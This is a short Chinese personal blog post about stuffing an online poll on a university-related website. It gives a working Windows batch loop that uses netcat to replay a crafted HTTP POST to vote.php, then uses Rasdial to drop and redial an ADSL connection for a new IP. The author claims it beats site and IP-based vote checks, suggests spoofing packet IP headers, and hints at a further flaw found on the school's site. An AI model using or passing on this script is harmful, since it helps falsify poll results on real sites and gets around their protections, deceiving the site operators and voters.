Holmesian Blog

刷投票

借助NC和ADSL网络环境,对robote发的那个投票(http://www.ecjtu.org/forum/htm_data/3/0710/13826.html)可以这样简单地刷

建一个1.bat:

    @Echo off  
    :Holmesian  
    nc -nvv 202.101.208.×× 80 < 1.txt  
    Rasdial NET /DISCONNECT  
    Rasdial NET abc abcd  
      
    Goto Holmesian  

其中1.txt的内容:

    POST /vote.php HTTP/1.1
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
    Referer: http://soul.ec×××.jx.cn/vote.php
    Accept-Language: zh-cn
    Content-Type: application/x-www-form-urlencoded
    UA-CPU: x86
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/1.1 (compatible; MSIE 1.0; Windows NT 3.2)
    Host: soul.ecjtu.jx.cn
    Content-Length: 46
    Connection: Keep-Alive
    Cache-Control: no-cache
    voteName%5B%5D=5&action=vote&vote=%CD%B6%C6%B1

然后去睡十来分钟回来………

基本上所有投票 无论是 基于网站程序的验证还是IP的验证应该都拿这个没办法,另外还可以通过修改数据封包的IP头 只要不通过第三方握手效果是最好的

好久没动这方面的东西了 随便玩玩 就这样吧

PS:不巧的 发现了学校一个小小的问题页面 待我 研究够了再发吧

当前页面是本站的「Google AMP」版。查看和发表评论请点击:完整版 »